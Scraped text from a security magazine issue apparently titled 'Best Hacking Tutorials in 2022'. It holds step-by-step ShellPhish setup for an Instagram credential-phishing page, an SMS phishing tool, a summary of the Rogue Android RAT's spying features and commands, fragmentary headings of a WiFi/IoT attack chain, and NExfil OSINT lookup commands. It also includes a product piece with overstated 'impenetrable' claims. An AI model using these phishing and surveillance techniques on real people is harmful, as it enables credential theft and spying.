Step1 - We need to choose the option that will be used for phishing. We opted for option number 2 which is Instagram.
Step 2- Next, we chose option number 1, “Traditional login page”.
Step 3 -The tool asks for the option of servers that will be used to forward the link. In our example, to demonstrate, we
chose option 1, "LocalHost."
Step 4 - We need to choose the port, by default it is 5555, let's use the default setting and press enter.
Shellphish will carry out the entire service initialization process, delivering the URL that will be used in this laboratory, in
which it was used to carry out an internal awareness campaign for an institution. To demonstrate how the tool works, the
link was opened in the server's own browser.
252
Figure 11. ShellPhish configs.
SmishingTools - Another tool with the aim of triggering SMS, developed in HTML and Python by Ishan Saha, which is not
in the official GNU-Linux repositories. I tried to download the official repository from the github page
(https://github.com/ishan-saha/SmishingTool). It requires the use of the free fast2sms API (https://www.fast2sms.com),
to send the SMS, in which it performs tunneling with ngrok, together with its Micro Framework Web flask.
Figure 12. Smishing Tool running.
FINAL CONSIDERATIONS
Given the above, it is very important to be careful not to expose yourself and not become a victim of these and other types of
scams.
253
It is always recommended that under no circumstances should you click on unknown links, it is important to always
observe the address forwarded, never reply to SMS and, in case you aren’t sure, consult the website and in no way provide
your data or fill in suspicious forms.
References
1. https://www.nist.gov/cyberframework
2. https://busy.org/@nowsourcing/the-future-of-phishing
3. https://github.com/AbirHasan2005/ShellPhish.git
4. https://docs.apwg.org/reports/apwg_trends_report_q3_2019.pdf
https://www.alyninc.com/2018/11/10/email-headers-what-can-they-tell-the-forensic-inv
estigator
254
PROJECT
INDIGO BRICK:
NEW PATHWAYS
IN DATA
HANDLING
ATLAS STARK
Atlas Stark is a security researcher at Stark Industries Inc. with
16+ years in the technology industry. Currently providing cyber
security solutions and OSINT services to anti-human trafficking
non-profits that aid in investigation and victim recovery. He also
consults with state level law enforcement agencies concerning
hacking related incidents. He splits his time between California
and Tennessee.
Please email stark@starkinternational.se with any questions or
concerns.
256
PROJECT INDIGO BRICK: New Pathways In Data Handling
Let’s face it, you can’t look at your phone, catch the local news or your favorite tech blog and not see or hear about a recent
ransomware attack and each attack seems to be getting more sophisticated and severe with each occurrence. From Linux to
Windows, and all the OS’s in between, it seems there is a new security patch everyday to combat the growing ransomware
problem. Vast resources from private and government entities have been allocated to fight this war. If it was a mere
resource problem, we would be closer to a solution, given the major corporate players that are dumping millions into the
coffers to solve the issue. However, this is a new quandary that needs a fresh fix.
In this article, we will not only explore the landscape of the problem that arises from ransomware attacks, but also some
patent pending software we have created that we believe can make a global difference in this fight and secure our data with
a new, dynamic solution. What is this solution, you ask? It’s called Project Indigo Brick.
It can be utilized as middle-ware, virtualized or configured and installed at the bare metal layer of any data infrastructure.
Project Indigo Brick is the project’s internal code name and was derived from one of my gamer profiles. We are still working
on marketing for a new name for the technology.
WHAT IS RANSOMWARE?
Simply put, ransomware is a piece of malware that is employed to hold the victim’s data hostage until a fee or “ransom” is
paid to release the encryption key so the victim can unlock and access their data. Some of the first instances of ransomware,
you may remember, utilized an “antivirus out of date” alert box that would pop up and once you interacted with the
message, it would deploy the malware thus locking your system. Later on, the victim would receive a phone call or an email
with a demand for payment to unlock the system and return control of the data back to the victim. This was the early days
of ransomware and involved attacking individuals rather than today’s attacks on large enterprises.
Today ransomware has graduated to a very sophisticated level of exploitation that has put our livelihoods at stake by
attacking the very infrastructure in which our systems and processes deliver goods and services, thus providing
convenience, health and safety to billions of people worldwide.
Ransomware has become an example of a “dark business model” being adopted by a variety of threat actors in many
theaters, and cyber criminals from a variety of backgrounds are cashing in on the trend. Creation and resale of ransomware
is also a huge business in which nefarious engineers can find a niche in this sector of this growing threat landscape. While
the true cost of ransomware is hard to truly determine, the shock waves definitely ripple throughout our current
infrastructure and usually ends in a chaotic spiral that impacts the bottom line of many industries.
IMPACT OF RANSOMWARE
Data worth trillions is at rest on servers all over the world. Data at rest on a server is a sitting duck, waiting to be stolen by
highly intelligent, extremely skilled and strikingly malicious cyber criminals who can literally out-think and outmaneuver
257
current security infrastructure and professionals whose job it is to protect the data that their enterprises require to stay in
business.
Cybercrime has become an acceptable loss that costs industries around the world billions every year. In fact, damage
related to cybercrime is set to hit $6 trillion by the end of 2021, making investing in security spending a priority.
Our world requires a more effective and global defense against frontal attacks on the data foundation and infrastructure
that, when compromised, can bring the downfall of the financial systems, the grid, healthcare, transportation, all branches
of government, the military, every business, charities and schools. It all runs on data, and all of that data is at risk in the
hands of hackers, both foreign and domestic, who have figured out how to penetrate some of the largest and most secure
data stores on earth. Below are some, but definitely not all, of the statistics that display only a fraction of the impact of
ransomware attacks.
• 90% of all financial institutions have experienced ransomware in the past year. (betanews.com)
• Atlanta – The ransomware demand was $51,000 (unpaid) while the recovery costs were estimated at $17 million.
• The NotPetya ransomware attack cost FedEx $300 million in Q1 2017. (Source: Reuters)
• A disabling virus spread to 10,000 machines in TSMC’s most secure and advanced facilities.
• The fitness brand Under Armour breach affected 150 million users.
Financial Institutions – in 2019:
• More than 204,448 users experienced an attempt to hack their banking information
• More than 280,000,000 URLs were identified as malicious
• Cybersecurity statistics show attacks were launched from within more than 190 countries
• Attacks on individuals doubled in 2018
• Attacks on businesses increased to one every 40 seconds
• Colonial Pipeline in 2021
LASTING IMPACT:
Another aspect of a ransomware attack is the lasting impact it inflicts upon communities everywhere. Long after the
ransom is paid, the company somewhat rebounds with stored backups and the attackers are apprehended, the effects of the
incident can still be felt once the dust settles. Whether it is a temporary loss of a service, an increase in the cost of a utility
or, in some cases, as in the case of several clinics around the world, it can be total financial ruin, thus cutting support from
thousands of people who depend on those services to maintain their daily quality of life. It seems not even healthcare and
258
education are safe from being targeted, which only compounds the problem and demands a supreme effort to combat the
threat.
WHAT’S THE SOLUTION?
The Department of Homeland Security has publicly stated the following, “The static nature of...systems provides
the attacker with an incredible advantage, as adversaries are able to take their time and plan attacks at
their leisure...Moving Target Defense would be a game-changing capability, that dynamically shifts the
attack surface, making it difficult for attackers to strike.”
A new and relevant mindset has to be achieved to truly solve the issue and we need to think of new ways to handle data
instead of static storage solutions that house critical data and employ out of date security protocols, thus providing a
vulnerable attack surface. Project Indigo Brick was born out of this new mindset in regards to how we handle all data and
interact with data-dependent services.
Project Indigo Brick’s file splitting, randomization and transit system makes the data impossible to penetrate because it
makes all data an array of moving targets, constantly in motion, all of the time. Project Indigo Brick breaks files into several
pieces, puts the data in motion across multiple pathways and reassembles the data when requested by a company’s cyber
security professional through a secured system or the company’s designated secure workstation. This is the ultimate in risk
mitigation. The goal of Project Indigo Brick is to enable large data-dependent companies to protect their data and introduce
them to new pathways in data handling.
WHAT DOES IT DO?
Data that is created or migrated is sent through the file splitting platform of Project Indigo Brick. Once the data passes
through the file splitting module of Project Indigo Brick, the data is deconstructed into smaller fragments that are
encrypted and given a specific token identifier. Once the data is sent to the server by way of an encrypted tunnel, each piece
of the data is rotated in a random pattern among each of the servers staying in constant motion, meaning that each
deconstructed fragment of data is transferred from one server to the next, randomly, within the framework of Indigo Brick.
Every time each data fragment goes to a different server, the identifying token changes and the old tokens are purged from
the pool, instead of being stored in a hidden file location that may or may not be discovered by an attacker.
FILE SPLITTING:
There are file splitting technologies in place today, however, they are usually split according to user preference making
them vulnerable to harvesting attacks. Project Indigo Brick’s File Splitting Platform is different in that the computer
259
decides how many encrypted file fragments and the size of each fragment to generate using a custom randomization
algorithm. (i.e., File 1 is 200 MB in size, randomly split into nine pieces, instead of each piece being 0.045 in
size, each piece would differ in size, and would still equal 200 MB when added together with the addition
of a byte or two.)
DATA PATHWAYS
The data stays within the boundaries of the data center or predetermined servers that the data will rotate between.
Once the data set has been segmented, the fragments are put into motion utilizing a similar randomization algorithm that
thwarts an attacker from following the data bits from one location to the other. As the data passes from server to server, a
new fragment token is generated and the same token is never used more than once. All of the data will rotate among servers
but never reside on the same server at one time. Each time the data gets routed to a new server, it will be re-encrypted with
a new unique key. Once the data is called up by way of encrypted tokens, the data is reassembled and sent to the requested
device, by way of the master key in the hands of a trusted individual or security professional in the physical location where
the main terminal is installed or by way of secured and approved appliance.
260
WHY IS IT IMPORTANT?
This methodology is applicable to every form of vulnerable communication that we call data; emails, photos, medical data,
personal financial information, credit card transactions, file downloads, file uploads, audio, video, photos, software code,
secret formulas, bank account numbers, routing numbers, names and addresses, insurance policies, tax returns, top-secret
military intel and plans – in short—all forms of data.
HOW SECURE IS IT?
Anyone attempting to steal a file could only get a fragment of that file, even if they could get through the high level of
encryption on that single fragment. Even if a hacker could penetrate every server and steal all of the pieces, he still couldn't
reassemble the file without the master key, which is a physical item in the hands of a trusted individual. A hacker would
have to be physically present in a locked down server room and be in possession of the physical key to all of the data on the
single authorized workstation in order to steal it. The system is designed to be impenetrable, so the sensitive data is always
in motion, segmented and encrypted. A physical key and an approved and provisioned workstation is required to
reassemble the data into meaningful information.
261
In closing, Project Indigo Brick aims to make data and electronic file handling more secure. Our approach to our technology
is threefold and can be summed up with the following bullet points.
1. Unique algorithms.
2. Advanced security protocols.
3. Interoperability with conventional and legacy systems.
262
We feel this is our secret recipe for the following reasons. Unique algorithms provide a foundation for new and fresh
approaches to old problems that desperately need solving. Our advanced security protocols within our technology were
designed from the minds of the adversary and have been tested in non-permissible environments instead of controlled
vulnerable spaces. Lastly, because there is a lot of existing legacy hardware that we depend on daily, our tech must be able
to operate in those hardware and software environments to be utilized on a large scale and attractive to data centers.
I hope this article was helpful in realizing the threat of ransomware, but also at the end of the day that there is a pot of gold
at the end of the rainbow.
263
Links and Resources:
1. https://betanews.com/
2. https://statista.com/
3. https://www.statista.com/topics/4136/ransomware/
4. https://threatpost.com/takeaways-colonial-pipeline-ransomware/166980/
5. Avast-Ransomware Article
6. Ukrainian Ransomware raid
7. https://www.darkreading.com/attacks-breaches/ransomware-is-not-the-problem
264
ROGUE -
HACKERS, RAT
AND
"MARKETING"
ON THE DARK
WEB
FELIPE HIFRAM
He is currently an information security professional focused on
social engineering, good usage habits and privacy on the
internet. He has already done work in Brazil, Germany, Ukraine,
Oman and Bahrain, in addition to writing several other articles.
266
Rogue - Hackers, RAT And "Marketing" On The Dark Web
1 PRINCIPLE OF EVERYTHING
It is a fact that nowadays many cyber criminals expose their achievements in forums via the dark web, but I swear to you
that in my years of experience with cybersecurity, I have never seen marketing as strong as I am seeing with RAT Rogue.
A few years ago, in 2017, a hacker nicknamed Triangulum appeared on some forums on the dark side of the internet,
apparently in search of recognition. For a while he exposed his skills (which were not at all impressive) in the forum, then
tried to sell one of his products, but did not have the fame I believe he was looking for.
Triangulum sought partnerships, as revealed by some reports of its activity in the forum, in 2017. And we believe that it was
in this search that it obtained the support of HeXaGoN, another hacker, known for his high ability in the development of
RAT Tools and other malware. Support was what was apparently missing, so for more than a year Triangulum disappeared
from the network, returning in April 2019, already with a new product to sell, and in the middle of 2020 announced four
different products on the network.
The partnership with HeXaGoN was perfect, since now we had real “Steve Jobs and Steve Wozniack” together, while one
was developing new tools, another was engaged in marketing.
Marketing started to be treated with more importance by Triangulum, it was noticeable his commitment in creating
attractive and well made images to advertise his “products”.
Some failures in negotiations with Russian forums have also been found.
2 ROGUE, THE CROWN JEWEL
After acquiring some experiences with marketing within the forum environments, the pair started to focus their efforts on
the newest product, a powerful MRAT malware, capable of giving almost full access to any infected Android phone.
After an analysis, it was discovered that Rogue is actually a mixture of two known malware, DarkShades and Hawkshaw.
DarkShades was developed by HeXaGoN, which announced its sales in 2019, but three days later officially sold the malware
to Triangulum. And Hawkshaw was malware whose source code leaked onto the network in 2017.
The joining of the families of these malware resulted in what we know today as Rogue.
2.1 A technical look
Rogue is a persistent malware; when it infects a device, it will soon ask for all the permissions it needs to start its activity,
and it will continue to request all of them until the user surrenders and gives permission. After that, the malware will
camouflage itself, hiding its own icon, in addition to registering as a device administrator.
267
And it doesn't stop there, if the user tries to remove Rogue from his administrator post, a message will be displayed “Are
you sure you want to clear all data??” with the purpose of scaring the person, making him give up the attempt. In order to
proceed with its activities without being detected, Rogue relies on the services of the platform known as Firebase, a
legitimate service from Google. The malware uses this service as a command and control (C&C) server, using Google's
authentic service infrastructure to deliver the stolen information and malware control commands. As a user of the Firebase
platform, the Rogue malware uses three of the services available by Google on its platform:
• “Cloud Messaging” to receive commands from the server;
• “Realtime Database” to upload data from the infected device;
• “Cloud Firestore” to upload files.
What's more, depending on the value of the APP_VERSION entry in the malware file, it can be executed in a way that
draws the least attention.
2.2 Multiplying
As if everything mentioned was not enough, the malware is able to adapt to the accessibility service of the device, which is
normally used to assist elderly people, capable of automating interactions with simulations of clicks.
By making use of the accessibility service, the malware gets rid of the Android security system, which ends up being unable
to inhibit their action. In the case of Rogue, it uses the accessibility service to record user actions and send the collected
data to the cloud.
As a sniffer, the Rogue malware carries its own notification service, which helps to be aware of all notifications that reach
the infected device, saving them in some directory created on the device itself and then sent to the Firebase database.
Rogue also has the ability to split notifications into three categories:
• Message Body:
• Sender;
• Timestamp.
And it separates the notifications interpreted as potential sources of confidential information:
• com.facebook.katana;
• com.facebook.orca;
• com.instagram.android;
268
• com.whatsapp;
• com.skype.raider;
• org.telegram.messenger;
• kik.android;
• jp.naver.line.android;
• com.google.android.gm;
• com.tencent.mm
The malware has, in addition to what has already been mentioned, a “Block List” service, without some numbers (chosen by
the malware itself) can be diverted, giving the malware the power to hang up a call if it detects an entry or output of the
numbers in the list. And if you accept a call, Rogue can record it and send it to the Firebase Cloud Store.
2.3 Functions and Commands:
As a summary of all the characteristics of the malware:
- Take pictures of the screen;

- Access the camera;
- Access the location;
- Reject connections;
- Record calls;
- Access contact list;
- Access the microphone;
- Access Bluetooth and Wi-Fi;
- Keylogger (monitor what is typed);
- Access technical information of the device;
- Read and save notifications (Facebook, WhatsApp, Instagram, Telegram, Skype and Line);
- Access logins (including bank applications);
...and more! All in real time.
Now, a list of malware commands:
- getLocation: Save location

- getMessages: Save SMS messages
- makeCall: Starts a phone call to a number provided
269
- getImages: Save your photos

- deleteCallLog: Deletes call records
- fileExplorer: Stores a list of directories
- recordCamera: Starts recording with the camera
- installApp: Install an application
- syncWhatsappMessages: Upload Whatsapp messages
- fileDownloadToLocal: Download a file
- deviceAdmin: Enable administrator permission
- openApp: Launch an application
- getContacts: Download your contacts
- root: Run a shell command
- takePicture: Take a Picture
- deleteFile: Deletes a file or directory
- downloadFile / uploadFile: Load a file
- sendMessage: Send an SMS
- recordScreen: Records a video from the screen
- deleteContact: Deletes a contact
- takeScreenShot: Take a picture of the screen
- recordAudio: Record an audio
- deviceInfo: Gathers technical information from the device
- deleteApp: Uninstall an application
- clearWhatsappMessages: Deletes Whatsapp messages from the local database
3 TODAY
Exactly one year ago, the Rogue RAT was leaked on an internet forum (dark web), but even after the leak, there was a lot of
demand for the purchase of the malware.
After learning about the entire process that led to the sale of this malware, it is clear how exposed mobile devices are today.
Just as these two individuals remain with their sales, others have also developed and launched their products on the illegal
market.
4 TAKE COVER
Protecting yourself against this type of threat includes simple habits to practice. I can mention the main ones, such as:
- Only download apps from official stores;

- Do not click on links in e-mails that you do not know where it comes from;
270
- Do not download anything from an email that you did not expect;
- Do not use public Wi-Fi networks;
- Pay attention to the requirements of apps;
- Keep an antivirus on your device.
REFERENCES:
The credits for the content of this article I give to the people of Check Point Research. Their research
and the subsequent report published by them were the basis for this article. All the details of the
research can be found at:
https://blog.checkpoint.com/2021/01/12/going-rogue-a-mastermind-behind-android-malware-return
s-with-a-new-rat/
271
SECURING
THE SUPPLY
CHAIN
SYED PEER
The author is a seasoned 20-year IT professional having worked
in Fortune 400 companies across diverse verticals from Social
Media to Banking to Cyber Security with experience managing
Software Development, Engineering, and Cyber Security teams.
273
Securing The Supply Chain
“Software is eating the world" ― Marc Andressen
INTRODUCTION
At no time since the dawn of the Industrial Revolution have manufacturing businesses thrived on the diversification and
choice of vendors, the globalization of suppliers and manpower services, and the accelerated growth of the customer base
due to improved infrastructure, shipping routes, and the internet.
However, as software has brought immense accessibility and reach to billions of customers, it has also become an Achilles
heel when used in concert with bad actors to disrupt, destroy and debilitate otherwise healthy and profitable organizations.
DEFINITION
As defined by Wikipedia "A supply chain attack is a cyber-attack that seeks to damage an organization by targeting
less-secure elements in the supply chain. A supply chain attack can occur in any industry, from the financial sector, oil
industry, to a government sector.”. Although there are many ways to define and explain this term, the key takeaway from
this definition is the “less-secure” element that is a constant in all forms of cyber security defense conversations.
BACKGROUND
The “modus operandi” of a supply chain attack centers around an individual or team of bad actors targeting an organization
not directly (as that would be too obvious) but rather through an external trusted partner or supplier who may have some
manner of access to the organization’s systems. This new route for hackers has grown within the last few years and has
transformed the attack surfaces significantly from not just the target organization itself but now across all companies,
suppliers, and service providers that have any manner of touchpoints within the organization.
274
Courtesy keepersecurity.com
This now presents a clear and present danger to organizations as sensitive data inside the organization that is accessible by
trusted partners outside the organization can now become the source of a data breach or worse still a malware injection.
This danger can be compounded if the target organization is a “supplier-of-suppliers” who happen to house sensitive
information about other suppliers on their systems. Like almost everything in the internet age, the danger growth curve is
exponential in nature.
PREVENTING CYBER ATTACKS
Besides the basic rule of thumb to always work to reduce the attack surface of an organization, a number of steps can be
taken both by manufacturers and suppliers to prevent attacks and harden system integrity.
• Supplier Security Standards and Policy: Manufacturers should hold suppliers in their supply chain
accountable by issuing necessary Cyber Security Standard documents or policies that they must abide by to win
business and orders from the manufacturer. Larger industry vendors may already be following this regime with their
275
customers, so it’s only a matter of validating compliance for them, but smaller vendors will be challenged in this
area due to increased staffing costs and skills needed to comply.
• Software Development Life Cycle Hardening: Suppliers should implement improved controls on their code
delivery platforms that aggregate, compile, build and distribute software to prevent malware injection and root-kit
infusion into the customer deliverable. The recent Solar Winds debacle is just one of the most notable instances of
an upgrade installer being compromised and affecting hundreds of customers. Ironically, one of the highest-profile
companies compromised in that attack was FireEye, a notable cybersecurity provider itself. Other firms, like
MalwareBytes, were also targeted together with behemoths like Microsoft.
Courtesy securityaffairs.co
• Secure Access and Privileges: Organizations should ensure that Suppliers’ Access and Privileges are regularly
reviewed and strengthened as part of the Annual Risk Assessment Cycle. Too often, organizations are engrossed in
their perimeter defenses looking both inwards and outwards without realizing that their most potent adversary may
be using the front door to enter their compound.
• Industry Security Certification: Manufacturers may demand that their suppliers work towards implementing a
recognized industry supply chain security certification standard such as ISO 28000. This may not be reasonable for
smaller outfits but the largest suppliers will have no trouble implementing the necessary framework and obtaining
the associated certification. Attackers will frequently seek out some of the smaller suppliers knowing full well that
they may not have the finances or expertise in-house to implement sophisticated controls necessary to thwart their
intrusion.
• Zero Trust Architecture (ZTA): When dealing with vendors’ interactions, their customers should be prepared to
adopt a Zero Trust Architecture (ZTA) approach. All network activity with the vendor must be considered malicious
by default. Only after each connection request passes a strict list of policies is it permitted to access the sensitive and
intellectual property within the customer systems.
• Cyber Security Awareness Program: Manufacturers may require their suppliers to institute a meaningful
Cyber Security Awareness Program in-house to educate their staff and all data-facing team members of the dangers
276
of malicious attacks and methods of recognizing a threat vector. Even the most administrative of roles such as
accounting, payroll, and HR would have access to some of the most sensitive data yet are oblivious of the simplest of
measures required to improve their security posture whilst being targeted continually by phishing emails.
Awareness programs should not be treated as a panacea but rather another complementary tool in the armor to
improve defenses, as too often humans present the most vulnerable of interfaces for hackers.
• Open Source Software & Platforms: Vendors should regularly review the usage and suitability of Open Source
software to ensure that the tools they take for granted have not been compromised and are contributing to
disseminating malware to their customers. Software build tools require particular attention here as they are the ones
responsible for packaging the final executable for distribution that ships to the customer at large. In fact, according
to Sonatype’s 2020 State of the Software Supply Chain Report, 90 % of all apps use open-source code, and 11 % of
them have known vulnerabilities.
• Independent 3rd party Risk Assessments: Although we all try to abide by an honor system in our daily lives
and business transactions, this may not be the same when working with vendors. Rather than leaving this to chance,
manufacturers are encouraged to require vendors to allow access to Third Party Risk Assessments that generate
reports to be returned to the manufacturer to validate their trust. Vendors will rarely do this voluntarily so it’s up to
their customers to insist on these checks and balances being in place. Such third-party risk assessments will
demonstrate clearly to customers the security posture of vendors and if they need to improve their position further
or risk losing business because of it.
• Reduce Outsourcing: The globalization of manufacturing and services during the last three decades has led to a
web of interdependencies that has been brought into sharp contrast due to the COVID-19 pandemic and its
associated restrictions. This has expanded the attack surface greatly, allowing hackers to focus on low-hanging fruit,
such as poorly prepared and defended downstream supply chain vendors, thereby getting backdoor access to some
of the largest corporations and their systems through the supplied products. Compromised electronics and
semiconductors products used within the US military, government, and vital civilian platforms provide foreign
adversaries with possible backdoors to attack these systems at will. This is especially concerning in the energy and
power distribution industry with many IoT devices being supplied from abroad.
This list is by no means final or conclusive of all opportunities for improving the supply chain conundrum. At best, it
provides some minimum guidelines on areas that need to be addressed to reduce the attack surface.
CONCLUSION
For businesses, both large and small, all the reasons above, and probably some not listed, demonstrate how the threat
landscape has changed when building products and services are reliant on an advanced supply chain of trusted partners
and 3rd party tools. The seaports in Los Angeles account for around 60% of all in-bound import merchandise and products
arriving into the US. Yet they have been backed up for months with a whole armada of container ships waiting to dock and
unload. The pandemic of 2019/2020/2021 has laid bare just how fragile our supply chain networks are with shortages
277
predicted in the near and long term. Car dealerships are flush with pre-owned models while the latest models float
aimlessly in the holds of ships anchored at the Pacific ports waiting their turn to unload. Manufacturers are unable to meet
or ship orders due to chip shortages that may not recede for months to come. The supply chain is the oxygen of the world
economy and needs to be protected if industry and the whole economic system is to survive.
References
1. Wikipedia Definition: https://en.wikipedia.org/wiki/Supply_chain_attack
2. 11 Ways to Prevent Supply Chain Attacks in 2021 (Highly Effective)

https://www.upguard.com/blog/how-to-prevent-supply-chain-attacks
3. Hacker Lexicon: What Is a Supply Chain Attack?

https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/
4. Sonatype 2020 State of the Software Supply Chain Report

https://www.sonatype.com/resources/white-paper-state-of-the-software-supply-chain-20
20
278

Best Hacking Tutorials in 2022

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Best Hacking Tutorials in 2022

Uploaded by

Copyright:

Available Formats

TEAM Betatesters &

Editors: Amit Chugh

Marta Strzelec Kevin Goosie

Michalina Szpyrka Daniel W. Dieterle

Senior Consultant/Publisher: Matthew Sabin

development as a professional pentester or ethical hacker.

Stay safe and enjoy!

Magdalena Jarzębska and Hakin9 Editorial Team

Embracing the philosophies of ethical hacking since

adolescence, he has been working for over 11 years in the ICT

and security industry.Today he is CTO of Cyber Evolution,

working specifically on cyber security in IoT and In- dustrial

He believes that security should be a concept that accompanies

digitization, so he spreads and studies systems to capillarize

security, inventing and pat- enting air-gap defense systems.

“Obtain persistence without leaving traces.”

So much extension, it means a wide surface of attack for a cracker.

WIFI (AND NOT ONLY) AS A STEALTH VECTOR

Breaching computer networks is a crime.

THE ATTACK CHAIN

1. Rogue AP with high transmission power (Tx)

2. “De-auth” technique against the target IoT

3. The target IoT will connect to the Rogue AP

4. Exploiting the IoT

5. Remote Shell & Persistence

● The aircrack suite. Here is the documentation: https://www.aircrack-ng.org/doku.php?id=Main

● A Kali Linux OS is used. - https://www.kali.org/

o lan1 = target network

Now, let's go do some recon on channel 14.

In this way, we will have, for example, an output like this:

Indeed, in terms of power, even higher.

The reason for bridging?

Phase 2 – Doing some deauth

Phase 3 – Waiting - the automatic phase

Phase 4 – The Art of Exploit

Phase 5 – The remote silent shell

HOW TO DEFEND FROM THESE POSSIBLE ATTACKS

habits of good use and privacy on the Internet. He has done

work for companies in Brazil, Ukraine, Oman and Bahrain, in

addition to writing several other articles.

"Privacy for the weak, transparency for the powerful!"

SOCIAL ENGINEERING, A BRIEF INTRODUCTION

SOCIAL NETWORKS, A DOOR TO SCAMS

ARE ALL POTENTIAL TARGETS?

HOW TO PROTECT YOURSELF

Suspect, even if minimally, enough to avoid headaches (with phishing).

Deprive streaming apps of showing what you watch or hear.

WHY I CREATED NEXFIL

Now let’s see NExfil in action.

Multiple usernames can be provided by a comma separated list

Two important features are in development right now:

$ git clone https://github.com/thewhiteh4t/nexfil.git

nexfil - Find social media profiles on the web | v1.0.0

Here are some example commands to get you started:

Perform a single username lookup:

$ python3 nexfil.py -u username

Multiple *comma* separated usernames for batch lookup:

$ python3 nexfil.py -l "user1, user2, user3, user4"

Multiple usernames from a file for batch lookup:

$ python3 nexfil.py -f users.txt

$ python3 nexfil.py -f /home/your_username/Downloads/

$ python3 nexfil.py -u user1 -d 8.8.8.8

$ python3 nexfil.py -u user1 -t 40

Multiple comma separated usernames for batch lookup: